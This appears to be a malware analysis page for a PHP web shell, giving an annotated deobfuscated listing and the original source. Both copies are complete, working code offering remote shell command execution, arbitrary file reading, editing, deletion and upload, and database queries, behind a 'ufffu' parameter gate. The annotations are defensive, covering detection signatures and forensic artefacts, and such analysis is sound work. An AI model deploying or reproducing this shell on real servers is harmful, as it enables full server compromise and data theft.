PHP Malware Analysis


Tags

Encoding
base64_decode
Execution
exec
Input
_GET
_POST
Environment
getcwd

Deobfuscated code

<?php

// Access gate: the request must carry a parameter named "ufffu" (from any of
// the sources PHP merges into $_REQUEST) or the script exits with no output.
// Only the key's presence is tested, never its value, so there is no real
// authentication. Detection: this parameter name has no reason to appear in
// requests to the hosting application.
if (!isset($_REQUEST['ufffu'])) {
    die;
}
// Returns true when $path begins with "/" (a POSIX absolute path). The shell
// uses this as its whole OS detection: anything else is treated as Windows.
// Loose comparison (==) on a one-character substring; the ternary is
// redundant since the comparison is already boolean.
function isLinux($path)
{
    return substr($path, 0, 1) == "/" ? true : false;
}
// Maps the isLinux() flag to the directory separator the shell will use when
// splitting and joining paths: "/" on Linux, "\" otherwise.
function getSlashDir($isLinux)
{
    return $isLinux ? '/' : '\\';
}
// Environment probe run on every gated request: derive the platform from the
// web server's current working directory and compute the filesystem root that
// the landing page links to ("/" on Linux, "<drive>:\" on Windows).
$cwd = getcwd();
$isLinux = isLinux($cwd);
if (!$isLinux) {
    // Windows: the first character of the cwd is taken as the drive letter.
    $driveLetter = substr($cwd, 0, 1);
}
$slash = getSlashDir($isLinux);
// Split cwd into components; this $parts is not read anywhere else in the
// script (cleanPath() has its own local of the same name).
$parts = explode($slash, $cwd);
$rootDir = $isLinux ? $slash : $driveLetter . ':' . $slash;
// Normalises a request-supplied path for use in the generated links: drops
// "." components, collapses ".." with the component before it, re-joins the
// remainder with the platform separator and guarantees a trailing separator.
// Callers (the "d" listing branch) append file names directly to the result
// and rely on that trailing separator. This is plain path resolution, not a
// restriction: ".." is honoured, never rejected.
function cleanPath($path, $isLinux)
{
    $slash = getSlashDir($isLinux);
    $parts = explode($slash, $path);
    foreach ($parts as $key => $val) {
        // Process '..' & '.' directories
        if ($val == "..") {
            // Blank this component and the one before it. For $key == 0 this
            // writes index -1, which PHP appends as a new element; it is
            // empty and therefore skipped by the join below.
            $parts[$key] = "";
            $lastKey = $key - 1;
            $parts[$lastKey] = "";
        } elseif ($val == ".") {
            $parts[$key] = "";
        }
    }
    reset($parts);
    // Linux paths are rebuilt as absolute; Windows paths keep whatever prefix
    // survived the split (the "C:" component, if the caller supplied one).
    $fixedPath = $isLinux ? "/" : "";
    $firstPiece = true;
    foreach ($parts as $val) {
        if ($val != "") {
            $fixedPath .= ($firstPiece ? '' : $slash) . $val;
            $firstPiece = false;
        }
    }
    if ($fixedPath == "") {
        // Only reachable on Windows (the Linux prefix is never empty).
        // $driveLetter is a global and is not in scope inside this function,
        // so this concatenates an undefined variable (empty drive prefix).
        $fixedPath = $isLinux ? $slash : $driveLetter . ":" . $slash;
    }
    if (substr($fixedPath, -1) != $slash) {
        $fixedPath .= $slash;
    }
    return $fixedPath;
}
// Command dispatch: exactly one branch runs per request, chosen by the first
// parameter name present in this order; the final else renders the landing
// page. Every argument is taken from $_REQUEST without validation or path
// restriction. Detection: the parameter names used here (chm, dl, gz, f, d,
// c, uploadForm, cc, mquery, df, ef) alongside the "ufffu" gate make a
// distinctive request signature in web-server logs.
if (isset($_REQUEST['chm'])) {
    // chm=<path>: chmod the given path to 0777 (Linux branch only). The @
    // suppresses warnings, so failure is only reported through the text.
    if (!$isLinux) {
        echo "This feature only works on Linux";
    } else {
        echo @chmod($_REQUEST['chm'], 0777) ? "Reassigned" : "Can't Reasign";
    }
} elseif (isset($_REQUEST['phpinfo'])) {
    // phpinfo=<anything>: dump the server configuration.
    phpinfo();
} elseif (isset($_REQUEST['dl'])) {
    // dl=<dir>&file=<name>: send an arbitrary readable file as a download.
    // The @fopen() only probes readability (its handle is never closed and
    // the result is loosely compared with true); $fileArr is computed but
    // never used.
    if (@fopen($_REQUEST['dl'] . $_REQUEST['file'], 'r') == true) {
        $_REQUEST['dl'] .= $_REQUEST['file'];
        if (substr($_REQUEST['dl'], 0, 1) == $slash) {
            $fileArr = explode($slash, $_REQUEST['dl']);
        }
        // The client-supplied file name goes straight into the header.
        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
        header('Content-type: application/octet-stream');
        readfile($_REQUEST['dl']);
    } else {
        // Not readable: echo the path back, with no error text.
        echo $_REQUEST['dl'];
    }
} elseif (isset($_REQUEST["gz"])) {
    // gz=<dir>: tar+gzip a whole directory and download it (Linux only).
    // The directory string is interpolated into the shell command line
    // unescaped. The archive is named by the current Unix timestamp, created
    // inside the target directory, served, then unlinked.
    // Forensic note: a tar child of the web-server process and a file named
    // by a 10-digit timestamp in a web-writable directory are artefacts of
    // this branch. The Content-type header is sent after the body has been
    // echoed, so it is dropped unless output buffering is active.
    if (!$isLinux) {
        echo "This feature only works on Linux";
    } else {
        $directory = $_REQUEST["gz"];
        if (substr($directory, -1) == "/") {
            $directory = substr($directory, 0, -1);
        }
        // The last path component becomes the download's base name.
        $dirParts = explode($slash, $directory);
        $fname = $dirParts[sizeof($dirParts) - 1];
        $archive = time();
        exec("cd {$directory}; tar czf {$archive} *");
        $output = @file_get_contents($directory . "/" . $archive);
        if (!$output) {
            header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
        } else {
            header("Content-disposition: attachment; filename={$fname}.tgz");
            echo $output;
        }
        header('Content-type: application/octet-stream');
        @unlink($directory . "/" . $archive);
    }
} elseif (isset($_REQUEST['f'])) {
    // f=<path>: return an arbitrary file as text/plain (the "view" link in
    // the directory listing). The fopen() result is not checked before use.
    $filename = $_REQUEST['f'];
    $file = fopen("{$filename}", "rb");
    header("Content-Type: text/plain");
    fpassthru($file);
} elseif (isset($_REQUEST['d'])) {
    // d=<dir>: HTML directory listing. Each entry links to the f (view), dl
    // (download), ef (edit) and df (delete) branches; the heading links to
    // the upload, gz and chm actions for the directory. With hldb=1 every
    // regular file is read and coloured red when it contains "mysql_",
    // "mysqli_" or "SELECT " — a hunt for database-access code and the
    // credentials that usually sit next to it. stripos() returns 0 (falsy)
    // for a match at offset 0, so a file beginning with one of those strings
    // is not flagged.
    $d = $_REQUEST['d'];
    echo "<pre>";
    if ($handle = opendir("{$d}")) {
        echo "<h2>Listing of ";
        $conString = "";
        if ($isLinux) {
            echo "<a href='?d={$slash}'>{$slash}</a>";
        }
        // Breadcrumb: one link per component of the normalised path.
        foreach (explode($slash, cleanPath($d, $isLinux)) as $val) {
            $conString .= $val . $slash;
            echo "<a href='?d={$conString}'>" . $val . "</a>" . ($val != "" ? $slash : '');
        }
        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d, $isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d, $isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d, $isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d, $isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
        while ($dir = readdir($handle)) {
            if (is_dir("{$d}{$slash}{$dir}")) {
                if ($dir != "." && $dir != "..") {
                    $dirList[] = $dir;
                }
            } else {
                if (isset($_REQUEST["hldb"])) {
                    // Reads the full contents of every regular file in the
                    // directory just to classify it.
                    $contents = file_get_contents("{$d}{$slash}{$dir}");
                    if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) {
                        $fileList[] = array('dir' => $dir, 'color' => 'red');
                    } else {
                        $fileList[] = array('dir' => $dir, 'color' => 'black');
                    }
                } else {
                    $fileList[] = array('dir' => $dir, 'color' => 'black');
                }
            }
        }
        // Navigation entries for "." and "..", then directories, then files.
        echo "<a href='?d={$d}{$slash}.'><font color=grey>.\n</font></a>";
        echo "<a href='?d={$d}{$slash}..'><font color=grey>..\n</font></a>";
        // Some configurations throw a notice if is_array is tried with a non-existent variable
        if (isset($dirList)) {
            if (is_array($dirList)) {
                foreach ($dirList as $dir) {
                    echo "<a href='?d={$d}{$slash}{$dir}'><font color=grey>{$dir}\n</font></a>";
                }
            }
        }
        if (isset($fileList)) {
            if (is_array($fileList)) {
                foreach ($fileList as $dir) {
                    echo "<a href='?f={$d}" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" . "|<a href='?dl=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Download</a>|" . "|<a href='?ef=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Edit</a>|" . "|<a href='?df=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Delete</a>| \n";
                }
            }
        }
    } else {
        echo "opendir() failed";
    }
    // Runs even when opendir() failed, i.e. with $handle === false.
    closedir($handle);
    echo "</pre>";
} elseif (isset($_REQUEST['c'])) {
    // c=<command>: run a shell command with stderr merged into stdout and
    // report its exit status. When the User-Agent starts with "curl" or
    // "wget" the HTML wrapper is omitted ("silent mode"), which points to
    // this branch being driven from command-line tooling as well as the
    // landing-page form. Detection: web-server child shells whose command
    // line ends in "2>&1", and curl/wget user agents requesting a PHP page
    // with a "c" parameter.
    if (@ini_get('safe_mode')) {
        // safe_mode was removed in PHP 5.4; dead code on modern runtimes.
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
    }
    $USER_AGENT = strtolower(substr($_SERVER['HTTP_USER_AGENT'], 0, 4));
    $SILENT_MODE = TRUE;
    if ($USER_AGENT != "curl" && $USER_AGENT != "wget") {
        $SILENT_MODE = FALSE;
        // The command text is echoed back unescaped in HTML mode.
        echo "<h2>Command: <I>" . $_REQUEST['c'] . "</I></h2><br /><br />";
    }
    // exec() fills $return with every output line and $returnedval with the
    // exit code; the last line it returns (and its trim()) is discarded.
    trim(exec($_REQUEST['c'] . ' 2>&1', $return, $returnedval));
    echo "<pre>Command exited with " . $returnedval . "</pre>";
    foreach ($return as $val) {
        if ($SILENT_MODE) {
            echo htmlentities($val);
        } else {
            echo '<pre>' . htmlentities($val) . '</pre>';
        }
    }
} elseif (isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) {
    // Two-step upload. uploadForm=1&dir=<path> renders a GET form that hits
    // the cc branch below, which stores the destination in the "uploadDir"
    // cookie; a subsequent multipart POST of field "file_name" is moved to
    // <cookie dir>/<basename of the client's file name>. The destination
    // directory is therefore read from a client-controlled cookie.
    if (isset($_FILES["file_name"])) {
        if ($_FILES["file_name"]["error"] > 0) {
            echo "Error";
        } else {
            $target_path = $_COOKIE["uploadDir"];
            if (substr($target_path, -1) != "/") {
                $target_path .= "/";
            }
            $target_path .= basename($_FILES['file_name']['name']);
            if (move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
                // The cookie is cleared once the move succeeds.
                setcookie("uploadDir", "");
                echo "The file " . basename($_FILES['file_name']['name']) . " has been uploaded";
            } else {
                echo "Error copying file, likely a permission error.";
            }
        }
    } else {
        ?>
        <form target="_blank" action="" method="GET">
            <input type="hidden" name="cc" value="1" />
            Submit this form before submitting file (will open in new window):<br />
            Upload Directory: <input type="text" name="dir" value="<?php 
        // The dir value is reflected unescaped into the attribute.
        echo $_REQUEST["dir"];
        ?>"><br />
            <input type="submit" value="submit" />
        </form>
        <br /><br />

        <form enctype="multipart/form-data" action="" method="post">
        Upload file:<input name="file_name" type="file"><input type="submit" value="Upload" /></form>

<?php 
    }
} elseif (isset($_REQUEST['cc'])) {
    // cc=1&dir=<path>: persist the upload destination in a cookie. Reads
    // $_GET specifically, so this step only works over GET.
    setcookie("uploadDir", $_GET["dir"]);
    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
} elseif (isset($_REQUEST['mquery'])) {
    // mquery=<sql>&host=&usr=&passwd=&db=: connect with request-supplied
    // credentials and run an arbitrary query, tabulating the rows. Uses the
    // legacy mysql_* extension (removed in PHP 7), so this branch fails on
    // modern runtimes. The query text is passed through htmlentities() but
    // the returned column values are echoed unescaped.
    $host = $_REQUEST['host'];
    $usr = $_REQUEST['usr'];
    $passwd = $_REQUEST['passwd'];
    $db = $_REQUEST['db'];
    $mquery = $_REQUEST['mquery'];
    @mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error());
    mysql_select_db($db);
    $result = mysql_query($mquery);
    if ($result != false) {
        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
        echo "Return Results:<br />";
        $first = true;
        echo "<table border='1'>";
        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
            if ($first) {
                // Header row built from the first result's column names.
                echo "<tr>";
                foreach ($row as $key => $val) {
                    echo "<td><b>{$key}</b></td>";
                }
                echo "</tr>";
                reset($row);
                $first = false;
            }
            echo "<tr>";
            foreach ($row as $val) {
                echo "<td>{$val}</td>";
            }
            echo "</tr>";
        }
        echo "</table>";
        mysql_free_result($result);
    } else {
        echo "Query Error: " . mysql_error();
    }
} elseif (isset($_REQUEST['df'])) {
    // df=<dir>&file=<name>: delete <dir><separator><name>, warnings
    // suppressed.
    $_REQUEST['df'] .= $slash . $_REQUEST['file'];
    if (@unlink($_REQUEST['df'])) {
        echo "File deleted";
    } else {
        echo "Error deleting file";
    }
} elseif (isset($_REQUEST['ef'])) {
    // ef=<dir>&file=<name>: file editor. The embedded encode64() runs in the
    // browser and submits the textarea as base64(escape(text)); the server
    // reverses that (base64_decode, then urldecode) before writing. The
    // encoding is presumably there so raw PHP source never appears in the
    // POST body — inferred from the button labels, not stated in the code.
    // "file" is appended to "ef" with no separator; the listing links pass a
    // cleanPath() result, which already ends in one.
    ?>
<script type="text/javascript">
  <!--
  var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  function encode64(inpStr)
  {
     inpStr=escape(inpStr);
     var output="";
     var chr1,chr2,chr3="";
     var enc1,enc2,enc3,enc4="";
     var i=0;

     do {
        chr1=inpStr.charCodeAt(i++);
        chr2=inpStr.charCodeAt(i++);
        chr3=inpStr.charCodeAt(i++);

        enc1=chr1 >> 2;
        enc2=((chr1 & 3) << 4) | (chr2 >> 4);
        enc3=((chr2 & 15) << 2) | (chr3 >> 6);
        enc4=chr3 & 63;

        if (isNaN(chr2))
        {
           enc3=enc4=64;
        }
        else if (isNaN(chr3))
        {
           enc4=64;
        }

        output=output +
           key.charAt(enc1) +
           key.charAt(enc2) +
           key.charAt(enc3) +
           key.charAt(enc4);
        chr1=chr2=chr3=enc1=enc2=enc3=enc4="";
     } while (i < inpStr.length);

     return output;
  }
  //-->
</script>
<?php 
    $_REQUEST['ef'] .= $_REQUEST['file'];
    if (isset($_POST["newcontent"])) {
        // Undo the browser-side encoding and overwrite the target file.
        $_POST["newcontent"] = urldecode(base64_decode($_POST["newcontent"]));
        $stream = @fopen($_REQUEST['ef'], "w");
        if ($stream) {
            fwrite($stream, $_POST["newcontent"]);
            echo "Write sucessful";
        } else {
            echo "Could not write to file";
        }
        // Called even when fopen() failed ($stream === false).
        fclose($stream);
    }
    ?>
    <form action="" name="f" method="POST">
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php 
    // The current file contents are emitted raw into the textarea.
    echo file_get_contents($_REQUEST['ef']);
    ?></textarea><br />
    <input type="submit" value="I base64 encoded it myself, don't run script" /><br />
    <input type="submit" value="Change (requires JavaScript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form>
<?php 
} else {
    // Landing page: OS and PHP version, links into the cwd and root
    // listings, and the MySQL query and shell command forms.
    ?>
<b>Server Information:</b><br />
<i>
Operating System: <?php 
    // NOTE(review): the "Original code" listing on this page has
    // `echo PHP_OS;` (a bare constant). This quoted form prints the literal
    // text "PHP_OS" and is an artefact of the deobfuscation, not of the
    // sample; the same applies to PHP_VERSION below.
    echo "PHP_OS";
    ?><br />
PHP Version: <?php 
    echo "PHP_VERSION";
    ?>&nbsp;&nbsp;&nbsp;<a href="?phpinfo=true">View phpinfo()</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php 
    echo getcwd();
    ?>"><b>Go to current working directory</b></a><br />
<a href="?d=<?php 
    echo $rootDir;
    ?>"><b>Go to root directory</b></a><br />
<b>Go to any directory:</b><form action="" method="GET"><input type="text" name="d" value="<?php 
    echo $rootDir;
    ?>" /><input type="submit" value="Go" /></form>

<hr>ExeDcute MySQL Query:
<form action="" METHOD="GET">
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"></td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"></td></tr>
<tr><td>password</td><td><input type="text" name="passwd"></td></tr>
<tr><td>database</td><td><input type="text" name="db"></td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea></td></tr>
<tr><td colspan="2"><input type="submit" value="Execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET">Execute Shell Command (safe mode is <?php 
    echo @ini_get('safe_mode') ? 'on' : 'off';
    ?>): <input type="text" name="c"><input type="submit" value="Go"></form></pre>
<?php 
}


Original code

<?php
if(!isset($_REQUEST['ufffu']))
die();
function isLinux($path){return (substr($path,0,1)=="/" ? true : false);}
function getSlashDir($isLinux){return($isLinux ? '/' : '\\');} $cwd=getcwd(); $isLinux=isLinux($cwd);
if(!$isLinux)
{ $driveLetter=substr($cwd,0,1);
} $slash=getSlashDir($isLinux); $parts=explode($slash,$cwd);
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));
function cleanPath($path,$isLinux)
{
    $slash=getSlashDir($isLinux);
    $parts=explode($slash,$path);
    foreach($parts as $key=>$val)   // Process '..' & '.' directories
    {
        if($val=="..")
        {
            $parts[$key]="";
            $lastKey=$key-1;
            $parts[$lastKey]="";
        }
        elseif($val==".")
        {
            $parts[$key]="";
        }
    }
    reset($parts);
    $fixedPath=($isLinux ? "/" : "");
    $firstPiece=true;
    foreach($parts as $val)
    {
        if($val != "")
        {
            $fixedPath .=  ($firstPiece ? '' : $slash) . $val;
            $firstPiece=false;
        }
    }
    if($fixedPath=="")
    {
        $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
    }
    if(substr($fixedPath,-1)!=$slash)
        $fixedPath .= $slash;
    return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
    if(!$isLinux) {
        echo "This feature only works on Linux"; }
    else
    {
        echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign");
    }
}
elseif(isset($_REQUEST['phpinfo']))
{ phpinfo(); }
elseif(isset($_REQUEST['dl']))
{
    if(@fopen($_REQUEST['dl'] .  $_REQUEST['file'],'r')==true)
    {
        $_REQUEST['dl'] .= $_REQUEST['file'];
        if(substr($_REQUEST['dl'],0,1)==$slash)
            $fileArr=explode($slash,$_REQUEST['dl']);

        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
        header('Content-type: application/octet-stream');
        readfile($_REQUEST['dl']);
    }
    else
    {
        echo $_REQUEST['dl'];
    }
}
elseif(isset($_REQUEST["gz"]))
{
    if(!$isLinux)
    {
        echo "This feature only works on Linux";
    }
    else
    {
        $directory=$_REQUEST["gz"];

        if(substr($directory,-1)=="/")
            $directory=substr($directory,0,-1);

        $dirParts=explode($slash,$directory);
        $fname=$dirParts[(sizeof($dirParts)-1)];

        $archive=time();

        exec("cd $directory; tar czf $archive *");
        $output=@file_get_contents($directory . "/" . $archive);

        if(!$output)
            header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
        else
        {
            header("Content-disposition: attachment; filename=$fname.tgz");
            echo $output;
        }

        header('Content-type: application/octet-stream');
        @unlink($directory . "/" . $archive);
    }
}
elseif(isset($_REQUEST['f']))
{
    $filename=$_REQUEST['f'];
    $file=fopen("$filename","rb");
    header("Content-Type: text/plain");
    fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
    $d=$_REQUEST['d'];
    echo "<pre>";
    if ($handle=opendir("$d"))
    {
        echo "<h2>Listing of ";
        $conString="";
        if($isLinux)
            echo "<a href='?d=$slash'>$slash</a>";
        foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
        {
            $conString .= $val . $slash;
            echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');
        }
        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
        while ($dir=readdir($handle))
        {
            if (is_dir("$d$slash$dir"))
            {
                if($dir != "." && $dir !="..")
                    $dirList[]=$dir;
            }
            else
            {
                if(isset($_REQUEST["hldb"]))
                {
                    $contents=file_get_contents("$d$slash$dir");
                    if (stripos($contents,"mysql_") || stripos($contents,"mysqli_") || stripos($contents,"SELECT "))
                    {
                        $fileList[]=array('dir'=>$dir,'color'=>'red');
                    }
                    else
                    {
                        $fileList[]=array('dir'=>$dir,'color'=>'black');
                    }
                }
                else
                {
                    $fileList[]=array('dir'=>$dir,'color'=>'black');
                }
            }
        }

        echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
        echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";

        // Some configurations throw a notice if is_array is tried with a non-existent variable
        if(isset($dirList))
        if(is_array($dirList))
        foreach($dirList as $dir)
        {
                echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>";
        }

        if(isset($fileList))
        if(is_array($fileList))
        foreach($fileList as $dir)
        {
            echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" .
                 "|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" .
                 "|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" .
                 "|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n";
        }
    }
    else
    echo "opendir() failed";
    closedir($handle);
    echo "</pre>";
}
elseif(isset($_REQUEST['c']))
{
    if(@ini_get('safe_mode'))
    {
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
    }
    $USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4));
    $SILENT_MODE=TRUE;
    if ($USER_AGENT != "curl" && $USER_AGENT != "wget")
    {
        $SILENT_MODE=FALSE;
        echo "<h2>Command: <I>" . $_REQUEST['c'] . "</I></h2><br /><br />";
    }
    trim(exec($_REQUEST['c'] . ' 2>&1',$return, $returnedval));
    echo "<pre>Command exited with " . $returnedval . "</pre>";
    foreach($return as $val)
    {
        if ($SILENT_MODE)
        {
            echo htmlentities($val);
        }
        else
        {
            echo '<pre>' . htmlentities($val) . '</pre>';
        }

    }
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
    if(isset($_FILES["file_name"]))
    {
        if ($_FILES["file_name"]["error"] > 0)
        {
                echo "Error";
        }
        else
        {
            $target_path=$_COOKIE["uploadDir"];
            if(substr($target_path,-1) != "/")
                $target_path .= "/";

            $target_path=$target_path . basename($_FILES['file_name']['name']);

            if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)) {
                setcookie("uploadDir","");
                echo "The file ".  basename($_FILES['file_name']['name']).
                " has been uploaded";
            }
            else
            {
                echo "Error copying file, likely a permission error.";
            }
        }
    }
    else
    {
?>
        <form target="_blank" action="" method="GET">
            <input type="hidden" name="cc" value="1" />
            Submit this form before submitting file (will open in new window):<br />
            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"]; ?>"><br />
            <input type="submit" value="submit" />
        </form>
        <br /><br />

        <form enctype="multipart/form-data" action="" method="post">
        Upload file:<input name="file_name" type="file"><input type="submit" value="Upload" /></form>

<?php
    }
}
elseif(isset($_REQUEST['cc']))
{
    setcookie("uploadDir",$_GET["dir"]);
    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
}
elseif(isset($_REQUEST['mquery']))
{
    $host=$_REQUEST['host'];
    $usr=$_REQUEST['usr'];
    $passwd=$_REQUEST['passwd'];
    $db=$_REQUEST['db'];
    $mquery=$_REQUEST['mquery'];
    @mysql_connect($host,$usr,$passwd) or die("Connection Error: " . mysql_error());
    mysql_select_db($db);
    $result=mysql_query($mquery);
    if($result!=false)
    {
        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
        echo "Return Results:<br />";
        $first=true;
        echo "<table border='1'>";
        while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
        {
            if($first)
            {
                echo "<tr>";
                foreach($row as $key=>$val)
                {
                    echo "<td><b>$key</b></td>";
                }
                echo "</tr>";
                reset($row);
                $first=false;
            }
            echo "<tr>";
            foreach($row as $val)
            {
                echo "<td>$val</td>";
            }
            echo "</tr>";
        }
        echo "</table>";
        mysql_free_result($result);
    }
    else
    {
        echo "Query Error: " . mysql_error();
    }
}
elseif(isset($_REQUEST['df']))
{
    $_REQUEST['df'] .= $slash . $_REQUEST['file'];
    if(@unlink($_REQUEST['df']))
    {
            echo "File deleted";
    }
    else
    {
            echo "Error deleting file";
    }
}
elseif(isset($_REQUEST['ef']))
{
?>
<script type="text/javascript">
  <!--
  var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  function encode64(inpStr)
  {
     inpStr=escape(inpStr);
     var output="";
     var chr1,chr2,chr3="";
     var enc1,enc2,enc3,enc4="";
     var i=0;

     do {
        chr1=inpStr.charCodeAt(i++);
        chr2=inpStr.charCodeAt(i++);
        chr3=inpStr.charCodeAt(i++);

        enc1=chr1 >> 2;
        enc2=((chr1 & 3) << 4) | (chr2 >> 4);
        enc3=((chr2 & 15) << 2) | (chr3 >> 6);
        enc4=chr3 & 63;

        if (isNaN(chr2))
        {
           enc3=enc4=64;
        }
        else if (isNaN(chr3))
        {
           enc4=64;
        }

        output=output +
           key.charAt(enc1) +
           key.charAt(enc2) +
           key.charAt(enc3) +
           key.charAt(enc4);
        chr1=chr2=chr3=enc1=enc2=enc3=enc4="";
     } while (i < inpStr.length);

     return output;
  }
  //-->
</script>
<?php
    $_REQUEST['ef'] .= $_REQUEST['file'];
    if(isset($_POST["newcontent"]))
    {
        $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
        $stream=@fopen($_REQUEST['ef'],"w");

        if($stream)
        {
            fwrite($stream,$_POST["newcontent"]);
            echo "Write sucessful";
        }
        else
        {
            echo "Could not write to file";
        }
        fclose($stream);
    }
?>
    <form action="" name="f" method="POST">
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']); ?></textarea><br />
    <input type="submit" value="I base64 encoded it myself, don't run script" /><br />
    <input type="submit" value="Change (requires JavaScript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form>
<?php
}
else
{
?>
<b>Server Information:</b><br />
<i>
Operating System: <?php echo PHP_OS; ?><br />
PHP Version: <?php echo PHP_VERSION; ?>&nbsp;&nbsp;&nbsp;<a href="?phpinfo=true">View phpinfo()</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php echo getcwd(); ?>"><b>Go to current working directory</b></a><br />
<a href="?d=<?php echo $rootDir; ?>"><b>Go to root directory</b></a><br />
<b>Go to any directory:</b><form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir; ?>" /><input type="submit" value="Go" /></form>

<hr>ExeDcute MySQL Query:
<form action="" METHOD="GET">
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"></td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"></td></tr>
<tr><td>password</td><td><input type="text" name="passwd"></td></tr>
<tr><td>database</td><td><input type="text" name="db"></td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea></td></tr>
<tr><td colspan="2"><input type="submit" value="Execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET">Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off'); ?>): <input type="text" name="c"><input type="submit" value="Go"></form></pre>
<?php
}